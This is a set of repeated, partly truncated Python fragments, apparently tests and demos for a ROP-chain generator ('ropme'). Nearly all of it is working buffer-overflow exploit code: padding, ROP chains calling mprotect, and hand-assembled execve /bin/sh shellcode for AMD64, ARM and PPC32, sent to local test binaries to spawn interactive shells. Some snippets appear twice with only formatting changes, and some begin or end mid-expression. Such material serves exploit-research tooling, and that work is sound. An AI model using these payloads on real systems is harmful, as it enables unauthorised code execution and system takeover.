def test_bof_syscall(self): filename = e('bof_syscall') p = process([filename,'3000']) buffer_address = int(p.readline().split(":")[1],16) target_address = buffer_address + 1024 rop = ropme.rop_to_shellcode([(filename, None, 0)], [], target_address) payload = 'A'*512 + 'B'*8 + rop payload += ((1024 - len(payload)) * 'B') + self.shellcode_amd64() p.writeline(payload) self.check_shell(p)
def test_bof_syscall(self): filename = e('bof_syscall') p = process([filename, '3000']) buffer_address = int(p.readline().split(":")[1], 16) target_address = buffer_address + 1024 rop = ropme.rop_to_shellcode([(filename, None, 0)], [], target_address) payload = 'A' * 512 + 'B' * 8 + rop payload += ((1024 - len(payload)) * 'B') + self.shellcode_amd64() p.writeline(payload) self.check_shell(p)
def test_bof(self): filename = e('bof') p = process([filename,'3000']) line = p.readline() buffer_address = int(line.split(":")[1],16) target_address = buffer_address + 1024 rop = ropme.rop_to_shellcode([(filename, None, 0)], [], target_address, archinfo.ArchAMD64(), logging.DEBUG, True) payload = 'A'*512 + 'B'*8 + rop payload += ((1024 - len(payload)) * 'B') + self.shellcode_amd64() p.writeline(payload) self.check_shell(p)
def test_bof(self): filename = e('bof') p = process([filename, '3000']) line = p.readline() buffer_address = int(line.split(":")[1], 16) target_address = buffer_address + 1024 rop = ropme.rop_to_shellcode([(filename, None, 0)], [], target_address, archinfo.ArchAMD64(), logging.DEBUG, True) payload = 'A' * 512 + 'B' * 8 + rop payload += ((1024 - len(payload)) * 'B') + self.shellcode_amd64() p.writeline(payload) self.check_shell(p)
shellcode = ( "\x01\x30\x8f\xe2" # add r3, pc, #1 ; 0x1 + "\x13\xff\x2f\xe1" # bx r3 (to the next instruction) + "\x78\x46" # mov r0, pc + "\x0c\x30" # adds r0, #12 + "\x01\x90" # str r0, [sp, #4] + "\x01\xa9" # add r1, sp, #4 + "\x92\x1a" # subs r2, r2, r2 + "\x02\x92" # str r2, [sp, #8] + "\x0b\x27" # movs r7, #11 + "\x01\xdf" # svc 1 + "//bin/sh" # program to execute + "\x00" # NULL to end the string ) target_address = buffer_address + 700 print "shellcode ({} bytes) address: 0x{:x}".format(len(shellcode), target_address) print "Using automatically built ROP chain" rop = ropme.rop_to_shellcode([(filename, None, 0), (libc, libc_gadget_file, libc_address)], [libc], target_address, archinfo.ArchARM(), logging.DEBUG) payload = 'A'*512 + 'B'*4 + rop payload += ((700 - len(payload)) * 'B') + shellcode payload += "JEFF" # To end our input with open("/tmp/rop", "w") as f: f.write(rop) with open("/tmp/payload", "w") as f: f.write(payload) p.writeline(payload) p.interactive()
shellcode = ( "\x01\x30\x8f\xe2" # add r3, pc, #1 ; 0x1 + "\x13\xff\x2f\xe1" # bx r3 (to the next instruction) + "\x78\x46" # mov r0, pc + "\x0c\x30" # adds r0, #12 + "\x01\x90" # str r0, [sp, #4] + "\x01\xa9" # add r1, sp, #4 + "\x92\x1a" # subs r2, r2, r2 + "\x02\x92" # str r2, [sp, #8] + "\x0b\x27" # movs r7, #11 + "\x01\xdf" # svc 1 + "//bin/sh" # program to execute + "\x00" # NULL to end the string ) target_address = buffer_address + 700 print "shellcode ({} bytes) address: 0x{:x}".format(len(shellcode), target_address) print "Using automatically built ROP chain" rop = ropme.rop_to_shellcode([(filename, None, 0)], [], target_address, archinfo.ArchARM(), logging.DEBUG) payload = 'A'*512 + 'B'*4 + rop payload += ((700 - len(payload)) * 'B') + shellcode payload += "JEFF" # To end our input with open("/tmp/rop", "w") as f: f.write(rop) with open("/tmp/payload", "w") as f: f.write(payload) p.writeline(payload) p.interactive()
if len(sys.argv) < 2: # manual mode print "Using manually built ROP chain" POP_RDI = 0x40063f # pop rdi ; ret POP_RSI = 0x400641 # pop rsi ; ret POP_RDX = 0x400643 # pop rdx ; ret POP_RCX = 0x400647 # pop rcx ; ret POP_R8 = 0x400649 # pop r8 ; ret POP_R9 = 0x40064c # pop r9 ; ret MPROTECT = 0x400520 target_page = target_address & ~0xfff rop = (p64(POP_RDI) + p64(target_page) + p64(POP_RSI) + p64(0x2000) + p64(POP_RDX) + p64(7) + p64(MPROTECT) + p64(target_address)) else: print "Using automatically built ROP chain" rop = ropme.rop_to_shellcode([(filename, None, 0)], [], target_address, archinfo.ArchAMD64(), logging.DEBUG, True) payload = 'A' * 512 + 'B' * 8 + rop payload += ((1024 - len(payload)) * 'B') + shellcode with open("/tmp/rop", "w") as f: f.write(rop) with open("/tmp/payload", "w") as f: f.write(payload) p.writeline(payload) p.interactive()
+ "\x0c\x30" # adds r0, #12 + "\x01\x90" # str r0, [sp, #4] + "\x01\xa9" # add r1, sp, #4 + "\x92\x1a" # subs r2, r2, r2 + "\x02\x92" # str r2, [sp, #8] + "\x0b\x27" # movs r7, #11 + "\x01\xdf" # svc 1 + "//bin/sh" # program to execute + "\x00" # NULL to end the string ) target_address = buffer_address + 700 print "shellcode ({} bytes) address: 0x{:x}".format(len(shellcode), target_address) print "Using automatically built ROP chain" rop = ropme.rop_to_shellcode([(filename, None, 0), (libc, libc_gadget_file, libc_address)], [libc], target_address, archinfo.ArchARM(), logging.DEBUG) payload = 'A' * 512 + 'B' * 4 + rop payload += ((700 - len(payload)) * 'B') + shellcode payload += "JEFF" # To end our input with open("/tmp/rop", "w") as f: f.write(rop) with open("/tmp/payload", "w") as f: f.write(payload) p.writeline(payload) p.interactive()
shellcode = ( # http://shell-storm.org/shellcode/files/shellcode-603.php "\x48\x31\xd2" # xor %rdx, %rdx + "\x48\x31\xc0" # xor %rax, %rax + "\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68" # mov $0x68732f6e69622f2f, %rbx + "\x48\xc1\xeb\x08" # shr $0x8, %rbx + "\x53" # push %rbx + "\x48\x89\xe7" # mov %rsp, %rdi + "\x50" # push %rax + "\x57" # push %rdi + "\x48\x89\xe6" # mov %rsp, %rsi + "\xb0\x3b" # mov $0x3b, %al + "\x0f\x05" # syscall ) target_address = buffer_address + 1024 print "shellcode ({} bytes) address: 0x{:x}".format(len(shellcode), target_address) rop = ropme.rop_to_shellcode([(filename, None, 0)], [], target_address) payload = 'A' * 512 + 'B' * 8 + rop payload += ((1024 - len(payload)) * 'B') + shellcode with open("/tmp/rop", "w") as f: f.write(rop) with open("/tmp/payload", "w") as f: f.write(payload) p.writeline(payload) p.interactive()
"\x7f\x08\x02\xa6" + # mflr r24 "\x3b\x18\x01\x34" + # addi r24,r24,308 "\x98\xb8\xfe\xfb" + # stb r5,-261(r24) "\x38\x78\xfe\xf4" + # addi r3,r24,-268 "\x90\x61\xff\xf8" + # stw r3,-8(r1) "\x38\x81\xff\xf8" + # addi r4,r1,-8 "\x90\xa1\xff\xfc" + # stw r5,-4(r1) "\x3b\xc0\x01\x60" + # li r30,352 "\x7f\xc0\x2e\x70" + # srawi r0,r30,5 "\x44\x00\x00\x02" + # sc "/bin/shZ" # the last byte becomes NULL ) target_address = buffer_address + 700 print "shellcode ({} bytes) address: 0x{:x}".format(len(shellcode), target_address) rop = ropme.rop_to_shellcode([(filename, None, 0)], [], target_address, archinfo.ArchPPC32('Iend_BE'), logging.DEBUG) payload = 'A'*512 + 'B'*0x1c # We need some custom gadgets to fixup the stack because of the PPC function saving the lr above the current stack frame payload += struct.pack(">i", 0x10000670) + "C" * 12 + struct.pack(">i", 0x1000066c) + "D"*4 # how annoying payload += rop payload += ((700 - len(payload)) * 'E') + shellcode payload += "JEFF" # To end our input with open("/tmp/rop", "w") as f: f.write(rop) with open("/tmp/payload", "w") as f: f.write(payload) p.writeline(payload) p.interactive()
"\x3b\x18\x01\x34" + # addi r24,r24,308 "\x98\xb8\xfe\xfb" + # stb r5,-261(r24) "\x38\x78\xfe\xf4" + # addi r3,r24,-268 "\x90\x61\xff\xf8" + # stw r3,-8(r1) "\x38\x81\xff\xf8" + # addi r4,r1,-8 "\x90\xa1\xff\xfc" + # stw r5,-4(r1) "\x3b\xc0\x01\x60" + # li r30,352 "\x7f\xc0\x2e\x70" + # srawi r0,r30,5 "\x44\x00\x00\x02" + # sc "/bin/shZ" # the last byte becomes NULL ) target_address = buffer_address + 700 print "shellcode ({} bytes) address: 0x{:x}".format(len(shellcode), target_address) rop = ropme.rop_to_shellcode([(filename, None, 0)], [], target_address, archinfo.ArchPPC32('Iend_BE'), logging.DEBUG) payload = 'A' * 512 + 'B' * 0x1c # We need some custom gadgets to fixup the stack because of the PPC function saving the lr above the current stack frame payload += struct.pack(">i", 0x10000670) + "C" * 12 + struct.pack( ">i", 0x1000066c) + "D" * 4 # how annoying payload += rop payload += ((700 - len(payload)) * 'E') + shellcode payload += "JEFF" # To end our input with open("/tmp/rop", "w") as f: f.write(rop) with open("/tmp/payload", "w") as f: f.write(payload) p.writeline(payload)